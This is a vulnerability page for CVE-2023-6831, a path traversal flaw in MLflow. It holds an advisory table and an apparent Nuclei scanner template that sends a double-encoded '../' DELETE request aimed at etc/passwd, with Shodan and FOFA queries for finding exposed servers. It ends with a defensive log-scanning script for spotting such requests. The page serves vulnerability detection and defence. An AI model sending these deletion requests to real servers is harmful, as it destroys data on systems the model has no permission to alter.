| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-6831 | 21 Dec 2023 19:16 | – | circl |
| Mlflow Security Vulnerabilities | 15 Dec 2023 00:00 | – | cnnvd |
| CVE-2023-6831 | 15 Dec 2023 00:00 | – | cve |
| CVE-2023-6831 Path Traversal: '\..\filename' in mlflow/mlflow | 15 Dec 2023 00:00 | – | cvelist |
| Path traversal in MLflow | 15 Dec 2023 03:30 | – | github |
| MLflow < 2.9.2 Path Traversal Vulnerability | 12 Nov 2024 00:00 | – | nessus |
| CVE-2023-6831 | 15 Dec 2023 01:15 | – | nvd |
| BIT-MLFLOW-2023-6831 Path Traversal: '\..\filename' in mlflow/mlflow | 6 Mar 2024 10:57 | – | osv |
| GHSA-554W-XH4J-8W64 Path traversal in MLflow | 15 Dec 2023 03:30 | – | osv |
| PYSEC-2023-253 | 15 Dec 2023 01:15 | – | osv |

```yaml
id: CVE-2023-6831

info:
  name: mlflow - Path Traversal
  author: byObin
  severity: high
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
  impact: |
    Authenticated attackers can exploit path traversal vulnerabilities to delete arbitrary files on mlflow servers through crafted API requests.
  remediation: |
    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6831
    - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
    - https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-6831
    cwe-id: CWE-22,CWE-29
    epss-score: 0.0329
    epss-percentile: 0.86983
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive,vuln

http:
  - raw:
      - |
        PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{randstr}}
      - |
        DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - "Content-Type: application/json"
          - "Server: gunicorn"
        condition: and

      - type: word
        part: body_2
        words:
          - "{}"

      - type: status
        status:
          - 500
# digest: 4a0a00473045022036e50c7f11c82d6f663321e9b5bdafede695cb536cbf927a44ae3887b58dd0d402210086ff5542586cecf1e28117ab91244f9bf414d61851c9a6836e538aefd3fddbcd:922c64590222798bb761d5b6d8e72950
```
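
For defenders, the request shape this template sends can be hunted in web access logs. The following is an added example, not part of the template or of MLflow's code: it percent-decodes artifact paths repeatedly and flags any that contain a `..` segment, treating backslash as a separator as well. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

ARTIFACT_PREFIX = "/api/2.0/mlflow-artifacts/artifacts/"
# Request field of a common/combined access log: "METHOD path HTTP/x.y" (assumed format)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so %252E -> %2E -> '.' ends up in the clear."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    """True if an artifact path, once fully decoded, contains a '..' segment."""
    if not path.startswith(ARTIFACT_PREFIX):
        return False
    artifact = fully_decode(path[len(ARTIFACT_PREFIX):].split("?", 1)[0])
    # Split on both separators: CWE-29 is the '\..\filename' form.
    segments = re.split(r"[\\/]+", artifact)
    return ".." in segments


def scan(log_lines):
    """Return (method, raw_path) for artifact requests that traverse upward."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group("path")):
            hits.append((m.group("method"), m.group("path")))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "PUT /api/2.0/mlflow-artifacts/artifacts/model.pkl HTTP/1.1" 200 2',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252Ftmp%252fexample HTTP/1.1" 500 2',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "DELETE /api/2.0/mlflow-artifacts/artifacts/run..1/model.pkl HTTP/1.1" 200 2',
    '10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /api/2.0/mlflow-artifacts/artifacts/a%5C..%5Cb HTTP/1.1" 404 2',
]

if __name__ == "__main__":
    for method, path in scan(SAMPLE_LOG):
        print(f"traversal attempt: {method} {path}")
```

A hit on a server running a release prior to 2.9.2 warrants checking for missing files; on patched servers the same hits are still useful as a signal of scanning activity.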